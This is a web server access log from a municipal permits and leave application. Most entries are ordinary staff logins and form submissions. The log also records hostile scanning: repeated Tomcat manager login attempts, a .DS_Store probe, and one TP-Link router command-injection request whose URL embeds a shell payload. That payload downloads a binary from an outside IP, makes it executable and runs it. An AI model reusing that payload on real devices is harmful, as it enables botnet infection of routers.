190.171.141.138 - - [18/Apr/2024:17:13:00 -0300] "GET /cormun/servlet/permisogoce?222508ad109b0d5a2f61d07a55b625ecf1ed8256d8da8955a9db04f74cc9abe8a0edd3be3168dbc8ba320bc7bae2cfef4fe4d019bf0ae71917e6a6497ad41dd4,gx-no-cache=1713470962905 HTTP/1.1" 200 47
218.38.210.48 - tomcat [18/Apr/2024:17:13:09 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [18/Apr/2024:17:13:20 -0300] "POST /cormun/servlet/permisogoce?e06b30fa52b27046ca0d7e6700b8a558,INS,0,,,,gx-no-cache=1713470973313 HTTP/1.1" 200 93
190.171.141.138 - - [18/Apr/2024:17:13:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
190.171.141.138 - - [18/Apr/2024:17:13:21 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13717
190.171.141.138 - - [18/Apr/2024:17:13:27 -0300] "GET /cormun/servlet/apermisogoceprn?11275245,P,20240418160859,PU HTTP/1.1" 200 1671
218.38.210.48 - tomcat [18/Apr/2024:17:15:31 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:17:17:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.43.89 - - [18/Apr/2024:17:18:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
181.212.43.89 - - [18/Apr/2024:17:18:18 -0300] "POST /cormun/servlet/hlogin?319aadf9d875fd9df64dadfb286e34df,gx-no-cache=1713471281155 HTTP/1.1" 200 90
181.212.43.89 - - [18/Apr/2024:17:18:19 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
181.212.43.89 - - [18/Apr/2024:17:18:19 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 21465
181.212.43.89 - - [18/Apr/2024:17:18:23 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 16812
181.212.43.89 - - [18/Apr/2024:17:18:26 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6883
181.212.43.89 - - [18/Apr/2024:17:18:36 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb81318ca53fb868041ae713cd8770ceb2f81adfe4652cd0beef50227df4d21ff9a04058fe3aa2faf1101385b58a3e157c65c8,gx-no-cache=1713471298551 HTTP/1.1" 200 84
181.212.43.89 - - [18/Apr/2024:17:18:40 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.43.89 - - [18/Apr/2024:17:18:42 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb81319c56724febd0c3758fe79ef5c0d60267232c3e88f7ae88fa39b196430f83de569367064147d5c1a77a8b38c75103d63f,gx-no-cache=1713471304864 HTTP/1.1" 200 48
179.43.190.218 - - [18/Apr/2024:17:18:45 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
181.212.43.89 - - [18/Apr/2024:17:18:49 -0300] "POST /cormun/servlet/permisogoce?319aadf9d875fd9df64dadfb286e34df,INS,0,,,,gx-no-cache=1713471311179 HTTP/1.1" 200 93
181.212.43.89 - - [18/Apr/2024:17:18:49 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
181.212.43.89 - - [18/Apr/2024:17:18:49 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 17054
181.212.43.89 - - [18/Apr/2024:17:18:58 -0300] "GET /cormun/servlet/trpermisosadjuntos?14324070,20240418161451,P, HTTP/1.1" 200 6341
181.212.43.89 - - [18/Apr/2024:17:19:00 -0300] "GET /cormun/servlet/permisosadjuntos?INS,14324070,P,20240418161451,, HTTP/1.1" 200 5659
181.212.43.89 - - [18/Apr/2024:17:19:00 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [18/Apr/2024:17:19:18 -0300] "POST /cormun/servlet/permisosadjuntos?319aadf9d875fd9df64dadfb286e34df,INS,14324070,P,20240418161451,, HTTP/1.1" 200 116
181.212.43.89 - - [18/Apr/2024:17:19:18 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
181.212.43.89 - - [18/Apr/2024:17:19:18 -0300] "GET /cormun/servlet/trpermisosadjuntos?14324070,20240418161451,P, HTTP/1.1" 200 6838
181.212.43.89 - - [18/Apr/2024:17:19:21 -0300] "POST /cormun/servlet/trpermisosadjuntos?319aadf9d875fd9df64dadfb286e34df,14324070,20240418161451,P,,gx-no-cache=1713471343394 HTTP/1.1" 200 90
181.212.43.89 - - [18/Apr/2024:17:19:21 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
181.212.43.89 - - [18/Apr/2024:17:19:21 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 17050
181.212.43.89 - - [18/Apr/2024:17:19:25 -0300] "POST /cormun/servlet/trpermisosgoce?319aadf9d875fd9df64dadfb286e34df,gx-no-cache=1713471346715 HTTP/1.1" 200 14273
181.212.43.89 - - [18/Apr/2024:17:19:25 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [18/Apr/2024:17:19:25 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.43.89 - - [18/Apr/2024:17:19:25 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [18/Apr/2024:17:19:25 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
209.141.55.133 - tomcat [18/Apr/2024:17:19:26 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.43.89 - - [18/Apr/2024:17:19:34 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6883
181.212.43.89 - - [18/Apr/2024:17:19:39 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb8131a8bc2008c602edfbefc0b43a6e58354fdfe4652cd0beef50227df4d21ff9a04058fe3aa2faf1101385b58a3e157c65c8,gx-no-cache=1713471361271 HTTP/1.1" 200 85
181.212.43.89 - - [18/Apr/2024:17:19:45 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb81315617e423cb780e408b9054e89a6f2473d7930c458cfce7c1efe621171e325a899367064147d5c1a77a8b38c75103d63f,gx-no-cache=1713471367367 HTTP/1.1" 200 47
181.212.43.89 - - [18/Apr/2024:17:19:48 -0300] "POST /cormun/servlet/permisogoce?319aadf9d875fd9df64dadfb286e34df,INS,0,,,,gx-no-cache=1713471370268 HTTP/1.1" 200 93
181.212.43.89 - - [18/Apr/2024:17:19:48 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1031
181.212.43.89 - - [18/Apr/2024:17:19:48 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713471346715 HTTP/1.1" 200 17218
181.212.43.89 - - [18/Apr/2024:17:19:53 -0300] "GET /cormun/servlet/trpermisosadjuntos?17137497,20240418161559,P, HTTP/1.1" 200 6362
181.212.43.89 - - [18/Apr/2024:17:19:55 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17137497,P,20240418161559,, HTTP/1.1" 200 5662
181.212.43.89 - - [18/Apr/2024:17:19:55 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [18/Apr/2024:17:20:06 -0300] "POST /cormun/servlet/permisosadjuntos?319aadf9d875fd9df64dadfb286e34df,INS,17137497,P,20240418161559,, HTTP/1.1" 200 116
181.212.43.89 - - [18/Apr/2024:17:20:06 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
181.212.43.89 - - [18/Apr/2024:17:20:06 -0300] "GET /cormun/servlet/trpermisosadjuntos?17137497,20240418161559,P, HTTP/1.1" 200 6841
181.212.43.89 - - [18/Apr/2024:17:20:08 -0300] "POST /cormun/servlet/trpermisosadjuntos?319aadf9d875fd9df64dadfb286e34df,17137497,20240418161559,P,,gx-no-cache=1713471391105 HTTP/1.1" 200 90
181.212.43.89 - - [18/Apr/2024:17:20:08 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
181.212.43.89 - - [18/Apr/2024:17:20:09 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713471346715 HTTP/1.1" 200 17215
181.212.43.89 - - [18/Apr/2024:17:20:18 -0300] "POST /cormun/servlet/trpermisosgoce?319aadf9d875fd9df64dadfb286e34df,gx-no-cache=1713471346715,gx-no-cache=1713471400315 HTTP/1.1" 200 14412
218.38.210.48 - tomcat [18/Apr/2024:17:20:18 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.43.89 - - [18/Apr/2024:17:20:23 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6903
181.212.43.89 - - [18/Apr/2024:17:20:29 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb8131e96cc4e28d1c5d348143d36cad301edddfe4652cd0beef50227df4d21ff9a04058fe3aa2faf1101385b58a3e157c65c8,gx-no-cache=1713471411550 HTTP/1.1" 200 83
181.212.43.89 - - [18/Apr/2024:17:20:38 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb8131185b5c351e19a1fe5461c621b297d04414eb81ef2edbbb342f08ceeb58d777aa9367064147d5c1a77a8b38c75103d63f,gx-no-cache=1713471421026 HTTP/1.1" 200 129
181.212.43.89 - - [18/Apr/2024:17:20:38 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [18/Apr/2024:17:20:38 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
181.212.43.89 - - [18/Apr/2024:17:20:47 -0300] "GET /cormun/servlet/permisogoce?cb09e1f853820da1fc0e33e05ceb8131185b5c351e19a1fe5461c621b297d04428e033d59c029a0e913030b3b23d2c3b9367064147d5c1a77a8b38c75103d63f,gx-no-cache=1713471430008 HTTP/1.1" 200 47
181.212.43.89 - - [18/Apr/2024:17:20:53 -0300] "POST /cormun/servlet/permisogoce?319aadf9d875fd9df64dadfb286e34df,INS,0,,,,gx-no-cache=1713471435614 HTTP/1.1" 200 93
181.212.43.89 - - [18/Apr/2024:17:20:53 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1031
181.212.43.89 - - [18/Apr/2024:17:20:54 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713471346715 HTTP/1.1" 200 17339
181.212.43.89 - - [18/Apr/2024:17:21:05 -0300] "GET /cormun/servlet/trpermisosadjuntos?16492398,20240418161648,P, HTTP/1.1" 200 6358
181.212.43.89 - - [18/Apr/2024:17:21:07 -0300] "GET /cormun/servlet/permisosadjuntos?INS,16492398,P,20240418161648,, HTTP/1.1" 200 5656
181.212.43.89 - - [18/Apr/2024:17:21:07 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.43.89 - - [18/Apr/2024:17:21:14 -0300] "POST /cormun/servlet/permisosadjuntos?319aadf9d875fd9df64dadfb286e34df,INS,16492398,P,20240418161648,, HTTP/1.1" 200 116
181.212.43.89 - - [18/Apr/2024:17:21:14 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1038
181.212.43.89 - - [18/Apr/2024:17:21:14 -0300] "GET /cormun/servlet/trpermisosadjuntos?16492398,20240418161648,P, HTTP/1.1" 200 6834
181.212.43.89 - - [18/Apr/2024:17:21:16 -0300] "POST /cormun/servlet/trpermisosadjuntos?319aadf9d875fd9df64dadfb286e34df,16492398,20240418161648,P,,gx-no-cache=1713471459010 HTTP/1.1" 200 90
181.212.43.89 - - [18/Apr/2024:17:21:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
181.212.43.89 - - [18/Apr/2024:17:21:17 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713471346715 HTTP/1.1" 200 17335
181.212.43.89 - - [18/Apr/2024:17:21:19 -0300] "POST /cormun/servlet/trpermisosgoce?319aadf9d875fd9df64dadfb286e34df,gx-no-cache=1713471346715,gx-no-cache=1713471461482 HTTP/1.1" 200 14578
218.38.210.48 - tomcat [18/Apr/2024:17:22:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:24:31 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.106 - - [18/Apr/2024:17:24:40 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713471663205 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:24:40 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.141.106 - - [18/Apr/2024:17:24:41 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4275
190.171.141.106 - - [18/Apr/2024:17:24:50 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10944
181.212.40.185 - - [18/Apr/2024:17:24:51 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 6324
181.212.40.185 - - [18/Apr/2024:17:24:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
181.212.40.185 - - [18/Apr/2024:17:25:03 -0300] "POST /cormun/servlet/hlogin?67dd1224b86be3a59c2a4f44c86d57bb,gx-no-cache=1713471685983 HTTP/1.1" 200 90
181.212.40.185 - - [18/Apr/2024:17:25:03 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
181.212.40.185 - - [18/Apr/2024:17:25:03 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 8722
218.38.210.48 - tomcat [18/Apr/2024:17:25:03 -0300] "GET /manager/html HTTP/1.1" 403 3196
181.212.40.185 - - [18/Apr/2024:17:25:07 -0300] "POST /cormun/servlet/trsolicitudot?67dd1224b86be3a59c2a4f44c86d57bb,gx-no-cache=1713471690179 HTTP/1.1" 200 107
181.212.40.185 - - [18/Apr/2024:17:25:08 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21264, HTTP/1.1" 200 10343
181.212.40.185 - - [18/Apr/2024:17:25:12 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2024,21264,,1, HTTP/1.1" 200 6265
181.212.40.185 - - [18/Apr/2024:17:25:12 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.40.185 - - [18/Apr/2024:17:25:12 -0300] "GET /cormun/servlet/solicitudotadjuntos?265a89b64347527404762250c0e8102f5aa6315fdfedd86995c2c5feae946df252162fc4f0df734c3af80cc3ac36e28f,gx-no-cache=1713471695697 HTTP/1.1" 200 30
181.212.40.185 - - [18/Apr/2024:17:25:13 -0300] "POST /cormun/servlet/solicitudotadjuntos?67dd1224b86be3a59c2a4f44c86d57bb,INS,2024,21264,,1,,gx-no-cache=1713471695802 HTTP/1.1" 200 4187
181.212.40.185 - - [18/Apr/2024:17:25:15 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1713471698432 HTTP/1.1" 200 26
181.212.40.185 - - [18/Apr/2024:17:25:25 -0300] "GET /cormun/servlet/solicitudotadjuntos?265a89b64347527404762250c0e8102ff3a5644cceaedb87263c4bed67018057,gx-no-cache=1713471708863 HTTP/1.1" 200 30
181.212.40.185 - - [18/Apr/2024:17:25:25 -0300] "GET /cormun/servlet/solicitudotadjuntos?265a89b64347527404762250c0e8102ff3a5644cceaedb87263c4bed67018057,gx-no-cache=1713471708920 HTTP/1.1" 200 30
181.212.40.185 - - [18/Apr/2024:17:25:30 -0300] "POST /cormun/servlet/solicitudotadjuntos?67dd1224b86be3a59c2a4f44c86d57bb,INS,2024,21264,,1, HTTP/1.1" 200 116
181.212.40.185 - - [18/Apr/2024:17:25:30 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1026
181.212.40.185 - - [18/Apr/2024:17:25:30 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21264, HTTP/1.1" 200 10518
181.212.40.185 - - [18/Apr/2024:17:25:32 -0300] "POST /cormun/servlet/trsolicitudadjuntos?67dd1224b86be3a59c2a4f44c86d57bb,2024,21264,,gx-no-cache=1713471715513 HTTP/1.1" 200 90
181.212.40.185 - - [18/Apr/2024:17:25:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 968
181.212.40.185 - - [18/Apr/2024:17:25:32 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 8722
181.212.40.185 - - [18/Apr/2024:17:26:16 -0300] "POST /cormun/servlet/trsolicitudot?67dd1224b86be3a59c2a4f44c86d57bb,gx-no-cache=1713471759690 HTTP/1.1" 200 4591
181.212.40.185 - - [18/Apr/2024:17:26:16 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.40.185 - - [18/Apr/2024:17:26:17 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.40.185 - - [18/Apr/2024:17:26:17 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [18/Apr/2024:17:26:17 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [18/Apr/2024:17:26:17 -0300] "POST /cormun/servlet/trsolicitudot?67dd1224b86be3a59c2a4f44c86d57bb,gx-no-cache=1713471759945 HTTP/1.1" 200 4352
181.212.40.185 - - [18/Apr/2024:17:26:20 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8739
181.212.40.185 - - [18/Apr/2024:17:26:24 -0300] "POST /cormun/servlet/trautorizarsolicitud?67dd1224b86be3a59c2a4f44c86d57bb,,gx-no-cache=1713471767289 HTTP/1.1" 200 4787
181.212.40.185 - - [18/Apr/2024:17:26:24 -0300] "POST /cormun/servlet/trautorizarsolicitud?67dd1224b86be3a59c2a4f44c86d57bb,,gx-no-cache=1713471767426 HTTP/1.1" 200 4546
218.38.210.48 - tomcat [18/Apr/2024:17:27:27 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:17:28:33 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:17:29:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
106.75.173.108 - - [18/Apr/2024:17:32:02 -0300] "GET /.DS_Store HTTP/1.1" 404 979
218.38.210.48 - tomcat [18/Apr/2024:17:32:12 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:33:55 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472218348 HTTP/1.1" 200 4495
190.171.141.106 - - [18/Apr/2024:17:34:00 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472222985 HTTP/1.1" 200 4493
190.171.142.10 - - [18/Apr/2024:17:34:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.142.10 - - [18/Apr/2024:17:34:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
190.171.142.10 - - [18/Apr/2024:17:34:16 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.142.10 - - [18/Apr/2024:17:34:19 -0300] "POST /cormun/servlet/hlogin?626eb06dd16e2ada9fb4284f4bdf1610,gx-no-cache=1713472241593 HTTP/1.1" 200 90
190.171.142.10 - - [18/Apr/2024:17:34:19 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
190.171.141.106 - - [18/Apr/2024:17:34:19 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.142.10 - - [18/Apr/2024:17:34:20 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4145
190.171.141.106 - - [18/Apr/2024:17:34:23 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472246138 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:34:23 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.141.106 - - [18/Apr/2024:17:34:23 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 8105
190.171.142.10 - - [18/Apr/2024:17:34:31 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13349
218.38.210.48 - tomcat [18/Apr/2024:17:34:34 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:34:44 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472267139 HTTP/1.1" 200 4583
190.171.141.106 - - [18/Apr/2024:17:34:44 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472267406 HTTP/1.1" 200 4471
190.171.142.10 - - [18/Apr/2024:17:34:52 -0300] "GET /cormun/servlet/alicenciaprn?20028654,L,20240416000000,PU HTTP/1.1" 200 1546
190.171.141.106 - - [18/Apr/2024:17:35:20 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.106 - - [18/Apr/2024:17:35:25 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472307931 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:35:25 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.141.106 - - [18/Apr/2024:17:35:25 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:35:33 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
181.212.40.185 - - [18/Apr/2024:17:35:43 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 16562
190.171.141.106 - - [18/Apr/2024:17:35:47 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.142.10 - - [18/Apr/2024:17:35:51 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,18015252,L,20240412000000, HTTP/1.1" 200 7286
190.171.142.10 - - [18/Apr/2024:17:35:51 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
190.171.142.10 - - [18/Apr/2024:17:35:52 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
190.171.141.106 - - [18/Apr/2024:17:35:55 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713472338371 HTTP/1.1" 200 4806
190.171.141.106 - - [18/Apr/2024:17:35:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.106 - - [18/Apr/2024:17:35:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:35:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:35:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.142.10 - - [18/Apr/2024:17:36:06 -0300] "POST /cormun/servlet/licenciaspermisos?626eb06dd16e2ada9fb4284f4bdf1610,DSP,18015252,L,20240412000000,,gx-no-cache=1713472348404 HTTP/1.1" 200 93
190.171.142.10 - - [18/Apr/2024:17:36:06 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1026
190.171.142.10 - - [18/Apr/2024:17:36:06 -0300] "GET /cormun/static/hpexe_return.js?20221129846037 HTTP/1.1" 200 1633
190.171.142.10 - - [18/Apr/2024:17:36:06 -0300] "GET /cormun/static/gxcfg.js?20221129846035 HTTP/1.1" 200 953
190.171.142.10 - - [18/Apr/2024:17:36:06 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13352
190.171.142.10 - - [18/Apr/2024:17:36:18 -0300] "GET /cormun/servlet/alicenciaprn?18015252,L,20240412000000,PU HTTP/1.1" 200 1558
190.171.141.106 - - [18/Apr/2024:17:36:31 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376135d34d5c193e1f967154d0c41c6f75f437cc510b34b61e077ba1b290d7505dd093dd1464eb00bc054f56eab4f233eebeb4ecabef202aa62a308810d3423663bd3492b628d7a991c939dc0ebe93ac2f1c5e9c2f65a2e5dbc5570621419e443b7093dd1464eb00bc054f56eab4f233eebeb4ecabef202aa62a308810d3423663bd3492b628d7a991c939dc0ebe93ac2f1c5c54ee61d7f11c996d2c7d6a18667b0bcd91e24067a2bf0bf1a13950e3fc79d,gx-no-cache=1713472373804 HTTP/1.1" 200 79
218.38.210.48 - tomcat [18/Apr/2024:17:36:42 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:36:45 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3767859bbeb6ab704b3acc1aedd6d06663f6b3991523bd2c6e836c4c146d3bebba6f899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713472387748 HTTP/1.1" 200 47
190.171.141.106 - - [18/Apr/2024:17:37:14 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.106 - - [18/Apr/2024:17:37:18 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472420674 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:37:18 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 965
190.171.141.106 - - [18/Apr/2024:17:37:18 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
209.141.55.133 - tomcat [18/Apr/2024:17:37:21 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:37:24 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713472427347 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:17:37:24 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.141.106 - - [18/Apr/2024:17:37:25 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7231
190.171.142.10 - - [18/Apr/2024:17:37:31 -0300] "GET /cormun/servlet/trcontratounov2? HTTP/1.1" 200 17402
190.171.142.10 - - [18/Apr/2024:17:37:31 -0300] "GET /cormun/static/gxcfg.js?2020121614367 HTTP/1.1" 200 953
190.171.142.10 - - [18/Apr/2024:17:37:32 -0300] "GET /cormun/static/Resources/PXToolsAddSelectedAction.png HTTP/1.1" 200 523
190.171.142.10 - - [18/Apr/2024:17:37:32 -0300] "GET /cormun/static/trcontratounov2.js?20201216143065 HTTP/1.1" 200 38486
190.171.141.106 - - [18/Apr/2024:17:37:32 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472435171 HTTP/1.1" 200 4496
190.171.142.10 - - [18/Apr/2024:17:37:33 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,PJARA,true HTTP/1.1" 200 35
190.171.141.106 - - [18/Apr/2024:17:37:38 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
190.171.141.106 - - [18/Apr/2024:17:37:41 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.141.106 - - [18/Apr/2024:17:37:50 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713472453322 HTTP/1.1" 200 4806
190.171.141.106 - - [18/Apr/2024:17:37:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:37:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.106 - - [18/Apr/2024:17:37:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.141.106 - - [18/Apr/2024:17:37:50 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
